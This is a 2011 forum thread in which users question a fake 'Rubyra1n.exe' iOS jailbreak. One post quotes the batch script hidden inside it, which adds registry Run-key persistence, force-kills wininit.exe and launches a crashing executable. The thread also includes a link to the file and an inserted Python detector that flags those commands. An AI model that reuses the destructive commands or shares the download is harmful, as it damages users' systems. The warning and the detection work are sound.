Rubyra1n.exe... Real??

Discussion in 'Jailbreaks and iOS Hacks' started by phynios, Feb 2, 2011.

  1. phynios macrumors member

    Joined:
    Feb 10, 2010
    #1
    Hi guys,

    Maybe one of you can clarify, if you're brave enough to test this, but can this be the real Rubyra1n? I found it simply by searching for 'rubyra1n.exe' in Google. Try it...??

    http://www.mediafire.com/?wcb3umb17lhchgq

    I ran it and it looks like the real thing but I didn't connect my device. I'm not confident enough to try as I'm happy on 4.1jb and have no reason to risk it, but I'd be interested to hear whether or not it can offer untethered jb for 4.2.1...

    Any takers?
     
  2. phynios thread starter macrumors member

    Joined:
    Feb 10, 2010
    #2
    You might notice also that this is 3.3MB and Limera1n is only 318KB by comparison... Might be relevant...
     
  3. ACardAttack macrumors 6502

    Joined:
    Mar 18, 2010
    #3
  4. localboy28 macrumors 6502a

    Joined:
    Jul 27, 2010
  5. phynios thread starter macrumors member

    Joined:
    Feb 10, 2010
    #5
    I saw that. I'd believe it to be genuine only rubyra1n.com isn't live yet. I'd nearly try it...

    @localboy, if you run it, it looks legit...
     
  6. CZK macrumors 6502a

    Joined:
    Oct 25, 2010
    #6
    Prolly a keylogger. Don't touch it.

    e/ i'll open it on someone else's computer lol.
     
  7. Firefox123 macrumors member

    Joined:
    Sep 10, 2009
    #7
    scan it on virustotal.com
     
  8. Xb0xGuru macrumors member

    Joined:
    Jul 28, 2010
    #8
    I've just extracted the .exe and there's a run.cmd hidden away..

    echo off
    cls
    REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f "Run1" /d "taskkill.exe /f /im wininit.exe"
    REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f "Run1" /d "%systemdrive%\rubyra1n\Bluescreen.exe"
    start %systemdrive%\rubyra1n\Bluescreen.exe
    taskkill.exe /f /in wininit.exe
    exit


    There's no reason why your registry should be messed with and you probably want to kill these processes if you ran it. Steer clear.

    EDIT - even curiouser, the Bluescreen.exe file is a self-extracting RAR with blue.exe hidden inside, the content having an INIT with the following line:

    IofCompleteRequest..ntoskrnl.exe

    So 100% positive- DO NOT touch this file.
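
A static triage of the run.cmd quoted in post #8, as an added example that is not part of the original thread: it flags Run-key persistence, forced termination of critical Windows processes, and executable launches by reading the script text only, without running anything. The rule names, the `triage` function and the process list are assumptions chosen for illustration.

```python
import re

# The run.cmd lines exactly as quoted in post #8 of this thread.
SAMPLE_RUN_CMD = r'''echo off
cls
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f "Run1" /d "taskkill.exe /f /im wininit.exe"
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f "Run1" /d "%systemdrive%\rubyra1n\Bluescreen.exe"
start %systemdrive%\rubyra1n\Bluescreen.exe
taskkill.exe /f /in wininit.exe
exit
'''

# Autostart keys and critical processes below are an illustrative subset, not a complete list.
AUTORUN_KEY = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?(?:HKLM|HKCU|HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)'
    r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\b', re.I)
CRITICAL = ("wininit.exe", "csrss.exe", "lsass.exe", "smss.exe",
            "winlogon.exe", "services.exe")
TASKKILL = re.compile(
    r'\btaskkill(?:\.exe)?\b[^\r\n]*?(' + "|".join(map(re.escape, CRITICAL)) + r')',
    re.I)
LAUNCH = re.compile(r'^\s*start\s+"?([^"\s]+\.exe)', re.I)
DATA_VALUE = re.compile(r'/d\s+"([^"]*)"', re.I)


def triage(script_text):
    """Return (line_number, rule, detail) findings for a batch script's text."""
    findings = []
    for no, line in enumerate(script_text.splitlines(), 1):
        if AUTORUN_KEY.search(line):
            # Record what the entry would start at logon, if a /d value is given.
            data = DATA_VALUE.search(line)
            findings.append((no, "autorun-persistence", data.group(1) if data else ""))
        kill = TASKKILL.search(line)
        if kill:
            findings.append((no, "kills-critical-process", kill.group(1).lower()))
        launch = LAUNCH.match(line)
        if launch:
            findings.append((no, "launches-executable", launch.group(1)))
    return findings


if __name__ == "__main__":
    for no, rule, detail in triage(SAMPLE_RUN_CMD):
        print(f"line {no}: {rule}: {detail}")
```
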
     
  9. noiceT macrumors 6502a

    Joined:
    Jul 7, 2008
    Location:
    Catalina Wine Mixer
    #9
    How could you ever possibly think this is even slightly legit? Let alone execute it on your computer..:confused:
     
  10. ZilogZ80 macrumors 6502a

    Joined:
    Aug 5, 2010
    #10
    Longing/greed/desperation is pretty effective at clouding judgment :)
     
  11. phynios thread starter macrumors member

    Joined:
    Feb 10, 2010
    #11
    Simple. Because there are people genuinely testing Rubyra1n for Geohot, in particular, stability, different iOS versions, etc...
     
  12. WhatAmI macrumors 6502a

    Joined:
    Sep 2, 2009
    #12
    ok...
     
  13. phynios thread starter macrumors member

    Joined:
    Feb 10, 2010
    #13
    I was just justifying my curiosity! :eek: I can't argue with Xb0xGuru's finding though. I extracted it myself to be sure, so thanks for the feedback. Oh well...

    No harm bringing it to everyone's attention anyway.
     
  14. Steven Jobson macrumors regular

    Joined:
    Jan 13, 2011
  15. phynios thread starter macrumors member

    Joined:
    Feb 10, 2010
    #15
    Wow, thank you for your lovely contribution to an otherwise valid discussion?! Aren't you hilarious!! HA HA HA

    Some people find it interesting that there is a mock JB application doing the rounds, and this forum is the perfect place to discuss same.

    Posts like that annoy the ***** out of me. Get off the forum if that's all you can contribute.
     
  16. Maverick1337 macrumors 65816

    Joined:
    Nov 4, 2008
    #16
    I wish I could run this .exe file on my Mac.















    /endsarcasm
     
  17. phynios thread starter macrumors member

    Joined:
    Feb 10, 2010
    #17
    :) :) :)
     
  18. Maverick1337 macrumors 65816

    Joined:
    Nov 4, 2008
    #18
    It's not polite to change things without asking, mister.
     
  19. phynios thread starter macrumors member

    Joined:
    Feb 10, 2010
    #19
    Ha ha, I only changed the ':D' smiley to a ':)' as the first one was showing the letter rather than the smiley!! :eek:
     
  20. Xb0xGuru macrumors member

    Joined:
    Jul 28, 2010
    #20
    You can as long as you don't have a PPC Mac. Just install Windows via Bootcamp and do it from there.

    Oh wait - there's no app for it so you might have to click and type a few things first.....

    /sarcasm

    :D
     
